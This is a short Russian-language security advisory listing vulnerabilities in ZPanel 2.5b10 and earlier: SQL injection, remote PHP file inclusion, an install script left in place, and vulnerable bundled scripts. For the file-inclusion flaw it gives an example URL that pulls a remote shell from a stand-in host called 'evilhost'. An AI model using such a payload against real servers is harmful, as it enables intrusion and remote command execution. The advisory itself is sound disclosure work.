Множественные уязвимости в ZPanel

Дата публикации:
17.03.2005
Дата изменения:
24.03.2009
Всего просмотров:
2009
Опасность:
Средняя
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
CVE-2005-0792
CVE-2005-0793
CVE-2005-0794
Вектор эксплуатации:
Удаленная
Воздействие:
Неавторизованное изменение данных
Обход ограничений безопасности
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
ZPanel 2.x

Уязвимые версии: ZPanel 2.5b10 и более ранние версии

Описание:
Уязвимости позволяют удаленному пользователю произвести SQL-инъекцию, выполнить произвольные команды и получить доступ к важной информации на системе.

1. SQL-инъекция возможна из-за недостаточной фильтрации входных данных в переменной uname в сценарии index.php. Злоумышленник может определить наличие имени учетной записи и произвести перебор паролей.

2. SQL-инъекция и php-инклюдинг возможет из-за некорректной обработки входных данных в сценарии zpanel.php. Пример:

http://localhost/zpanel/zpanel.php?page=http://evilhost/shell

3. По умолчанию, после установки не удаляется установочный сценарий. Пример:

http://localhost/ZPanel/admin/install.php

4. ZPanel использует уязвимые сценарии других производителей. (Например phpBB Forums 2.0.8a)

URL производителя: http://www.thezpanel.com

Решение: Установите последнюю версию с сайта производителя.

Журнал изменений:
24.03.2009
Изменена секция "Решение"

Ссылки: Few remote bugs in zPanel

или введите имя

CAPTCHA